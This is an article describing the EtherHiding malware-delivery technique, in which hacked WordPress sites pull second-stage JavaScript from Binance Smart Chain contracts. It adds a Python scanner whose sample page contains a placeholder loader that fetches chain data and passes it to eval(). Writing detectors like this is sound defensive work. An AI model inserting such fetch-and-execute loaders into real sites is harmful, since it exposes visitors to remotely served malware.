Cybercriminals have invented a new way to distribute malicious code. The technique, codenamed EtherHiding, targets WordPress vulnerabilities and leverages Binance Smart Chain contracts to conceal parts of malicious payloads delivered through fake browser updates. The threat was identified and extensively analyzed by Guardio, a cybersecurity research company.
The new attack vector is the latest iteration of the "ClearFake" campaign first described by Randy McEoin. The method relies on compromised WordPress sites, taken over by exploiting vulnerable plugins or outdated CMS versions, or by using stolen credentials bought on the dark web. Attackers inject hidden JavaScript code into article pages that retrieves a second-stage payload from a server they control.
Using the malicious code, attackers are able to remotely control the defaced website, modify the infection process, and display any content they want, including bogus browser update notifications that serve as a vehicle for distributing malware. They can also change tactics, update blocked domains, and replace detected payloads without having to re-access the WordPress sites.
In the initial attacks, the second-stage code was hosted on Cloudflare Workers, but Cloudflare blocked these accounts, potentially disrupting the campaign. In the evolution of "ClearFake," cybercriminals have developed a new method for hosting malicious code anonymously and without any risk of being blocked – a sort of bullet-proof hosting facilitated by the Binance Smart Chain blockchain.
This approach allows hackers to tweak the attack process by leveraging the eth_call method of Binance's SDK to fetch the malicious JavaScript code from the blockchain. Calling eth_call is a costless operation, originally designed to simulate smart contract execution for read-only or testing purposes without any "external" impact. The call is not recorded on the chain, so criminals can distribute malicious payloads without leaving a transaction trail that could be used to track them.
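The injected loader described above has a recognisable shape: an inline script that reads from the chain (a BSC RPC endpoint or an eth_call) and then executes the decoded result. The scanner below is an added example, not code from Guardio or from the campaign; the keyword heuristics, the RPC hostname pattern and the sample page are assumptions constructed for illustration, so tune them to your own telemetry before relying on them.

```python
import re
from typing import Dict, List

# Heuristics are assumptions for this example, not indicators from the report:
# a page script that (1) talks to a BSC JSON-RPC endpoint or calls eth_call and
# (2) executes whatever it gets back matches the loader pattern described above.
RPC_HINTS = re.compile(r"bsc-dataseed|binance\.org|eth_call|new\s+Web3\s*\(|ethers\.", re.I)
EXEC_HINTS = re.compile(r"\beval\s*\(|new\s+Function\s*\(|document\.write\s*\(|\.innerHTML\s*=", re.I)
DECODE_HINTS = re.compile(r"hexToAscii|hexToUtf8|toUtf8String|fromCharCode|parseInt\([^,)]+,\s*16\)", re.I)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def score_script(body: str) -> Dict[str, bool]:
    """Return which of the three traits an inline script body shows."""
    return {
        "chain_read": bool(RPC_HINTS.search(body)),
        "dyn_exec": bool(EXEC_HINTS.search(body)),
        "hex_decode": bool(DECODE_HINTS.search(body)),
    }


def find_suspicious_scripts(html: str) -> List[Dict[str, object]]:
    """Flag inline scripts that both read from the chain and execute the result.

    Hex decoding of the returned value raises confidence, because eth_call
    returns ABI-encoded hex that must be decoded before it can be run."""
    findings = []
    for idx, match in enumerate(SCRIPT_RE.finditer(html)):
        traits = score_script(match.group(1))
        if traits["chain_read"] and traits["dyn_exec"]:
            findings.append({
                "script_index": idx,
                "confidence": "high" if traits["hex_decode"] else "medium",
                "traits": traits,
            })
    return findings


# Constructed sample page: script 0 is ordinary site code, script 1 has the
# shape of the injected loader (zero address used as a placeholder contract).
SAMPLE_HTML = """<html><body><p>article text</p>
<script>document.getElementById("year").textContent = new Date().getFullYear();</script>
<script>
const w3 = new Web3("https://bsc-dataseed.binance.org/");
const c = new w3.eth.Contract(ABI, "0x0000000000000000000000000000000000000000");
c.methods.get().call().then(r => eval(w3.utils.hexToAscii(r)));
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in find_suspicious_scripts(SAMPLE_HTML):
        print(finding)
```

Run it over exported post content or a crawl of your own site's rendered pages; a hit on a page you did not publish is a strong signal the site has been compromised.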
The EtherHiding method makes takedowns difficult and lets criminals get away unpunished, and it illustrates the legal challenges related to decentralized technologies. "A critical point of intervention to halt such campaigns lies in understanding why WordPress sites are so vulnerable and frequently compromised, as they serve as primary gateways for these threats to reach a vast pool of victims," Guardio authors explain.
"To protect your site and, eventually, all your visitors, you should always keep your WordPress infra and plugins updated, safeguard credentials, use robust, periodically-changed passwords and just keep an eye on what is happening on your site," they suggest.